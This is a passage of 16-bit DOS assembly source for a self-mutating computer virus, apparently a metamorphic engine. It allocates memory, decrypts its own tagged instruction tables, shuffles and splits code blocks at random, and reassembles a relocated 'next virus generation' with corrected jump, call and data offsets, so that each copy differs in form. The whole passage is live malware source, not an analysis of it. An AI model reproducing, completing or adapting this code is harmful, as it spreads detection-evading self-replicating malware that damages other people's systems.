+ + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 01h ; One byte instruction + + dec ax ; AX = segment of current Memory C... + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of current Memory C... + + db 03h ; Three bytes instruction + + mov ax,ds:[03h] ; AX = size of memory block in par... + + db 03h ; Three bytes instruction + + cmp ax,1900h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store size of memory block in p... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + mov ah,4ah ; Resize memory block + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov ah,48h ; Allocate memory + + db 04h ; Four bytes instruction + + mov bx,[bp+1234h] ; BX = size of memory block in par... + + db 11101101b ; Data reference + dw 1394h ; Pointer to mcb_size___ + db 04h ; Four bytes instruction + + sub bx,[bp+1234h] ; Subtract new size in paragraphs ... + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 01h ; One byte instruction + + dec bx ; BX = number of paragraphs to all... + + db 04h ; Four bytes instruction + + cmp bx,267h ; Insufficient memory? + + db 01110010b+10000000b ; Below? Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? 
Jump to terminate_ + dw 0beeh ; Pointer to terminate_ + db 02h ; Two bytes instruction + + mov es,ax ; ES = segment of allocated memory + + db 07h ; Seven bytes instruction + + add es:[02h],6942h ; Store 16-bit random number + + db 07h ; Seven bytes instruction + + mov word ptr es:[0ch],00h + + db 07h ; Seven bytes instruction + + mov es:[04h],118h ; Store offset of block information + + db 07h ; Seven bytes instruction + + mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... + + db 07h ; Seven bytes instruction + + mov es:[08h],5a8h ; Store offset of data information + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov bx,730h ; BX = offset of next virus genera... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +initial_tmc_ db 11101110b ; Beginning of block + dw 0fa0h ; Block identification of initial_... + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +tmc_ini_loo db 11101110b ; Beginning of block + dw 0bb8h ; Block identification of tmc_ini_loo + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of block or instruct... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + or al,al ; End of table? + + db 01110100b+10000000b ; Zero? Jump to calc_blocks_ + dw 0bbch ; Pointer to calc_blocks_ + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? 
Jump to exam_blo__ + dw 0bb9h ; Pointer to exam_blo__ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... + dw 0bb8h ; Pointer to tmc_ini_loo + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo__ db 11101110b ; Beginning of block + dw 0bb9h ; Block identification of exam_blo__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110101b+10000000b ; Not equal? Jump to exam_blo___ + dw 0bbah ; Pointer to exam_blo___ + db 02h ; Two bytes instruction + + mov al,00h ; Don't add anything to offset wit... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +exam_blo___ db 11101110b ; Beginning of block + dw 0bbah ; Block identification of exam_blo___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? 
Jump to next_byte_ + dw 0bbbh ; Pointer to next_byte_ + db 02h ; Two bytes instruction + + mov ax,si ; AX = offset of block identification + + db 01h ; One byte instruction + + dec ax ; AX = offset of block within table + + db 01h ; One byte instruction + + stosw ; Store offset of block within table + + db 03h ; Three bytes instruction + + mov ax,0ffffh ; Block is still in one part + + db 01h ; One byte instruction + + stosw ; Store block identification + + db 03h ; Three bytes instruction + + mov ax,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +next_byte_ db 11101110b ; Beginning of block + dw 0bbbh ; Block identification of next_byte_ + db 02h ; Two bytes instruction + + mov al,02h ; Add two to offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bb8h ; Pointer to tmc_ini_loo + db 11101111b ; End of block +calc_blocks_ db 11101110b ; Beginning of block + dw 0bbch ; Block identification of calc_blo... + db 03h ; Three bytes instruction + + lea ax,[di-10h] ; AX = number of blocks multiplied... 
+ + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 02h ; Two bytes instruction + + shr ax,01h ; Divide number of blocks by two + + db 04h ; Four bytes instruction + + mov es:[0ah],ax ; Store number of blocks + + db 02h ; Two bytes instruction + + xor ax,ax ; End of table + + db 01h ; One byte instruction + + stosw ; Store end of table + + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc0h ; Pointer to exam_bl + db 11101111b ; End of block +split_bloc db 11101110b ; Beginning of block + dw 0bbdh ; Block identification of split_bloc + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 05h ; Five bytes instruction + + mov bp,es:[0ah] ; BP = number of blocks + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 02h ; Two bytes instruction + + shl ax,01h ; Multiply random number with two + + db 03h ; Three bytes instruction + + add ax,10h ; Add ten to random number + + db 02h ; Two bytes instruction + + mov di,ax ; DI = random offset within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101111b ; End of block +exam_nxt_bl_ db 11101110b ; Beginning of block + dw 0bbeh ; Block identification of exam_nxt... + db 03h ; Three bytes instruction + + add di,04h ; DI = offset of next offset withi... + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of next block within... + + db 02h ; Two bytes instruction + + or si,si ; End of table? + + db 01110101b+10000000b ; Not zero? 
Jump to exam_blo____ + dw 0bbfh ; Pointer to exam_blo____ + db 03h ; Three bytes instruction + + mov di,10h ; DI = offset of table of blocks + + db 03h ; Three bytes instruction + + mov si,es:[di] ; SI = offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbfh ; Pointer to exam_blo____ + db 11101111b ; End of block +exam_blo____ db 11101110b ; Beginning of block + dw 0bbfh ; Block identification of exam_blo... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to exam_bl + dw 0bc0h ; Pointer to exam_bl + db 02h ; Two bytes instruction + + cmp di,ax ; End of table of blocks? + + db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ + dw 0bbeh ; Pointer to exam_nxt_bl_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcah ; Pointer to exam_tbl_in + db 11101111b ; End of block +exam_bl db 11101110b ; Beginning of block + dw 0bc0h ; Block identification of exam_bl + db 04h ; Four bytes instruction + + mov ax,es:[di+02h] ; AX = block information + + db 03h ; Three bytes instruction + + cmp ax,0ffffh ; Block is still in one part? + + db 01110100b+10000000b ; Equal? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,ax ; DI = offset of end of first part... + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 01h ; One byte instruction + + stosb ; Store JMP imm16 + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... 
+ + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 02h ; Two bytes instruction + + sub ax,di ; Subtract offset of end of first ... + + db 01h ; One byte instruction + + stosw ; Store 16-bit immediate + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl_ db 11101110b ; Beginning of block + dw 0bc1h ; Block identification of exam_bl_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,10h ; Data; CALL; JMP; Data reference...? + + db 01110111b+10000000b ; Above? Jump to exam_bl__ + dw 0bc2h ; Pointer to exam_bl__ + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 04h ; Four bytes instruction + + mov bp,[bp+1234h] ; BP = probability + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 02h ; Two bytes instruction + + or ax,ax ; Split up block? + + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110100b+10000000b ; Zero? Jump to split_bloc_ + dw 0bc8h ; Pointer to split_bloc_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +exam_bl__ db 11101110b ; Beginning of block + dw 0bc2h ; Block identification of exam_bl__ + db 02h ; Two bytes instruction + + cmp al,11101111b ; End of block? + + db 01110100b+10000000b ; Equal? 
Jump to end_of_bloc + dw 0bc9h ; Pointer to end_of_bloc + db 02h ; Two bytes instruction + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + + db 01110011b+10000000b ; Above or equal? Jump to exam_data_ + dw 0bc4h ; Pointer to exam_data_ + db 02h ; Two bytes instruction + + cmp al,10h ; Data? + + db 01110110b+10000000b ; Below or equal? Jump to sto_instruc + dw 0bc3h ; Pointer to sto_instruc + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of data + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc3h ; Pointer to sto_instruc + db 11101111b ; End of block +sto_instruc db 11101110b ; Beginning of block + dw 0bc3h ; Block identification of sto_instruc + db 02h ; Two bytes instruction + + xor cx,cx ; Zero CX + + db 02h ; Two bytes instruction + + mov cl,al ; CL = length of instruction + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0beah ; Pointer to sto_ins_loo + db 11101111b ; End of block +sto_ins_loo db 11101110b ; Beginning of block + dw 0beah ; Block identification of sto_ins_loo + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 01h ; One byte instruction + + stosb ; Store byte of instruction + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo + dw 0beah ; Pointer to sto_ins_loo + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_data_ db 11101110b ; Beginning of block + dw 0bc4h ; Block identification of exam_data_ + db 02h ; Two bytes instruction + + cmp al,11101101b ; Data reference? + + db 01110101b+10000000b ; Not equal? 
Jump to exam_bl___ + dw 0bc5h ; Pointer to exam_bl___ + db 01h ; One byte instruction + + push di ; Load DI from stack + + db 05h ; Five bytes instruction + + mov di,es:[08h] ; DI = offset within data information + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + dec ax ; Decrease offset within next viru... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[08h],di ; Store offset within data informa... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +exam_bl___ db 11101110b ; Beginning of block + dw 0bc5h ; Block identification of exam_bl___ + db 02h ; Two bytes instruction + + cmp al,11101110b ; Beginning of block? + + db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ + dw 0bc7h ; Pointer to sto_call_jm_ + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[04h] ; DI = offset within block informa... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus ge... + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[04h],di ; Store offset within block inform... + + db 03h ; Three bytes instruction + + cmp ax,4c5h ; Block identification of tmc_table_? + + db 01110101b+10000000b ; Not equal? 
Jump to exam_messag + dw 0bc6h ; Pointer to exam_messag + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 02h ; Two bytes instruction + + mov di,bx ; DI = offset within next virus ge... + + db 04h ; Four bytes instruction + + lea si,[bp+1234h] ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(table_end-table_begin) + + db 02h ; Two bytes instruction + + rep movsb ; Move table to top of memory + + db 02h ; Two bytes instruction + + mov bx,di ; BX = offset within next virus ge... + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_messag db 11101110b ; Beginning of block + dw 0bc6h ; Block identification of exam_messag + db 03h ; Three bytes instruction + + cmp ax,2328h ; Block identification of message? + + db 01110101b+10000000b ; Not equal? Jump to exam_probab + dw 0bedh ; Pointer to exam_probab + db 03h ; Three bytes instruction + + mov ax,14h ; Probability of including message + + db 04h ; Four bytes instruction + + cmp [bp+1234h],ax ; Include message? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110011b+10000000b ; Above or equal? Jump to examine_... + dw 0bebh ; Pointer to examine_nex + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 02h ; Two bytes instruction + + sub al,10h ; AL = length of message + + db 02h ; Two bytes instruction + + mov ah,00h ; Zero AH + + db 02h ; Two bytes instruction + + add si,ax ; SI = offset of end of message + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +exam_probab db 11101110b ; Beginning of block + dw 0bedh ; Block identification of exam_probab + db 03h ; Three bytes instruction + + cmp ax,0bech ; Block identification of probabi...? 
+ + db 01110101b+10000000b ; Not equal? Jump to examine_nex + dw 0bebh ; Pointer to examine_nex + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = probability_ + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01h ; One byte instruction + + dec ax ; Decrease probability + + db 03h ; Three bytes instruction + + cmp ax,05h ; Probability too small? + + db 01110011b+10000000b ; Above or equal? Jump to store_pr... + dw 0bf5h ; Pointer to store_proba + db 03h ; Three bytes instruction + + mov ax,64h ; Reset probability + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bf5h ; Pointer to store_proba + db 11101111b ; End of block +store_proba db 11101110b ; Beginning of block + dw 0bf5h ; Block identification of store_proba + db 03h ; Three bytes instruction + + mov es:[bx],ax ; Store probability + + db 03h ; Three bytes instruction + + add bx,02h ; Add two to offset within next vi... + + db 03h ; Three bytes instruction + + add si,03h ; SI = offset of beginning of next... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bebh ; Pointer to examine_nex + db 11101111b ; End of block +examine_nex db 11101110b ; Beginning of block + dw 0bebh ; Block identification of examine_nex + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be0h ; Pointer to decrypt_byt + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc2h ; Pointer to exam_bl__ + db 11101111b ; End of block +sto_call_jm_ db 11101110b ; Beginning of block + dw 0bc7h ; Block identification of sto_call... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 05h ; Five bytes instruction + + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = offset within next virus ge... + + db 01h ; One byte instruction + + stosw ; Store offset within next virus g... 
+ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0be1h ; Pointer to decrypt_id_ + db 01h ; One byte instruction + + stosw ; Store block identification + + db 05h ; Five bytes instruction + + mov es:[06h],di ; Store offset within CALL; JMP; J... + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 03h ; Three bytes instruction + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to exam_bl_ + dw 0bc1h ; Pointer to exam_bl_ + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 01h ; One byte instruction + + inc bx ; Increase offset within next viru... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc1h ; Pointer to exam_bl_ + db 11101111b ; End of block +split_bloc_ db 11101110b ; Beginning of block + dw 0bc8h ; Block identification of split_bloc_ + db 04h ; Four bytes instruction + + mov es:[di+02h],bx ; Store offset within next virus g... + + db 03h ; Three bytes instruction + + add bx,03h ; Add three to offset within next ... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bc9h ; Pointer to end_of_bloc + db 11101111b ; End of block +end_of_bloc db 11101110b ; Beginning of block + dw 0bc9h ; Block identification of end_of_bloc + db 01h ; One byte instruction + + dec si ; Decrease offset of block within ... + + db 03h ; Three bytes instruction + + mov es:[di],si ; Store offset of block within table + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bbdh ; Pointer to of split_bloc + db 11101111b ; End of block +exam_tbl_in db 11101110b ; Beginning of block + dw 0bcah ; Block identification of exam_tbl_in + db 06h ; Six bytes instruction + + cmp word ptr es:[0ch],00h + + db 01110101b+10000000b ; End of second table? Jump to cor... 
+ dw 0fa1h ; Pointer to correc_i16 + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 05h ; Five bytes instruction + + mov es:[0ch],bx ; Store offset within next virus g... + + db 04h ; Four bytes instruction + + add si,(second_table-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fa0h ; Pointer to initial_tmc + db 11101111b ; End of block +correc_i16 db 11101110b ; Beginning of block + dw 0fa1h ; Block identification of correc_i16 + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (ES) + + db 04h ; Four bytes instruction + + sub bx,730h ; Subtract offset of next virus ge... + + db 04h ; Four bytes instruction + + mov ds:[0eh],bx ; Store length of virus + + db 03h ; Three bytes instruction + + mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... + + db 04h ; Four bytes instruction + + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of CALL imm16; JMP... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcbh ; Pointer to jmp_call_lo + db 11101111b ; End of block +jmp_call_lo db 11101110b ; Beginning of block + dw 0bcbh ; Block identification of jmp_call_lo + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,118h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... 
+ + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +find_block__ db 11101110b ; Beginning of block + dw 0bcch ; Block identification of find_blo... + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc + dw 0bcdh ; Pointer to found_bloc + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_block__ + dw 0bcch ; Pointer to find_block__ + db 11101111b ; End of block +found_bloc db 11101110b ; Beginning of block + dw 0bcdh ; Block identification of found_bloc + db 02h ; Two bytes instruction + + mov dx,[si] ; DX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 02h ; Two bytes instruction + + mov al,[bx] ; AL = first byte of instruction + + db 02h ; Two bytes instruction + + cmp al,11110000b ; Jump condition? + + db 01110010b+10000000b ; Below? Jump to sto_call_j + dw 0bcfh ; Pointer to sto_call_j + db 03h ; Three bytes instruction + + sub byte ptr [bx],10000000b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... + + db 01h ; One byte instruction + + dec dx ; Decrease 8-bit immediate + + db 03h ; Three bytes instruction + + cmp dx,7fh ; 8-bit immediate out of range? 
+ + db 01111111b+10000000b ; Greater? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 03h ; Three bytes instruction + + cmp dx,0ff80h ; 8-bit immediate out of range? + + db 01111100b+10000000b ; Less? Jump to invert_jcc_ + dw 0bceh ; Pointer to invert_jcc_ + db 02h ; Two bytes instruction + + mov [bx],dl ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of end of Jcc imm8 + + db 04h ; Four bytes instruction + + mov [bx],1001000010010000b + + db 04h ; Four bytes instruction + + mov byte ptr [bx+02h],10010000b + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +invert_jcc_ db 11101110b ; Beginning of block + dw 0bceh ; Block identification of invert_jcc_ + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + dec bx ; BX = offset of Jcc imm8 + + db 03h ; Three bytes instruction + + xor byte ptr [bx],00000001b + + db 01h ; One byte instruction + + inc bx ; BX = offset of 8-bit immediate + + db 03h ; Three bytes instruction + + mov byte ptr [bx],03h ; Store 8-bit immediate + + db 01h ; One byte instruction + + inc bx ; BX = offset of JMP imm16 + + db 02h ; Two bytes instruction + + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bcfh ; Pointer to sto_call_j + db 11101111b ; End of block +sto_call_j db 11101110b ; Beginning of block + dw 0bcfh ; Block identification of sto_call_j + db 02h ; Two bytes instruction + + mov [bx],al ; Store CALL imm16; JMP imm16 + + db 01h ; One byte instruction + + inc bx ; BX = offset of 16-bit immediate + + db 02h ; Two bytes instruction + + sub dx,bx ; Subtract offset within next viru... 
+ + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 01h ; One byte instruction + + dec dx ; Decrease 16-bit immediate + + db 02h ; Two bytes instruction + + mov [bx],dx ; Store 16-bit immediate + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd0h ; Pointer to correc_i16_ + db 11101111b ; End of block +correc_i16_ db 11101110b ; Beginning of block + dw 0bd0h ; Block identification of correc_16_ + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo + dw 0bcbh ; Pointer to jmp_call_lo + db 03h ; Three bytes instruction + + mov si,5a8h ; SI = offset of data information + + db 04h ; Four bytes instruction + + mov cx,ds:[08h] ; CX = offset of end of data infor... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of data informat... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of data references... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd1h ; Pointer to data_ref_lo + db 11101111b ; End of block +data_ref_lo db 11101110b ; Beginning of block + dw 0bd1h ; Block identification of data_ref_lo + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + lodsw ; AX = offset of block within data... + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov si,118h ; SI = offset of block information + + db 04h ; Four bytes instruction + + mov cx,ds:[04h] ; CX = offset of end of block info... + + db 02h ; Two bytes instruction + + sub cx,si ; Subtract offset of block informa... 
+ + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 02h ; Two bytes instruction + + shr cx,01h ; Divide number of block by two + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +find_bloc db 11101110b ; Beginning of block + dw 0bd2h ; Block identification to find_bloc + db 03h ; Three bytes instruction + + cmp ax,[si+02h] ; Found block? + + db 01110100b+10000000b ; Equal? Jump to found_bloc_ + dw 0bd3h ; Pointer to found_bloc_ + db 03h ; Three bytes instruction + + add si,04h ; SI = offset of next block in table + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to find_bloc + dw 0bd2h ; Pointer to find_bloc + db 11101111b ; End of block +found_bloc_ db 11101110b ; Beginning of block + dw 0bd3h ; Block identification of found_bloc_ + db 02h ; Two bytes instruction + + mov ax,[si] ; AX = offset of block + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack (AX) + + db 03h ; Three bytes instruction + + sub ax,730h ; Subtract offset of next virus ge... + + db 02h ; Two bytes instruction + + mov [bx],ax ; Store 16-bit immediate + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to data_ref_lo + dw 0bd1h ; Pointer to data_ref_lo + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1772h ; Pointer to restore_cod + db 11101111b ; End of block +restore_cod db 11101110b ; Beginning of block + dw 1772h ; Block identification of restore_cod + db 04h ; Four bytes instruction + + mov ax,[bp+1234h] ; AX = segment of PSP for current ... + + db 11101101b ; Data reference + dw 0befh ; Pointer to program_seg_ + db 04h ; Four bytes instruction + + mov cx,[bp+1234h] ; CX = initial SS relative to star... 
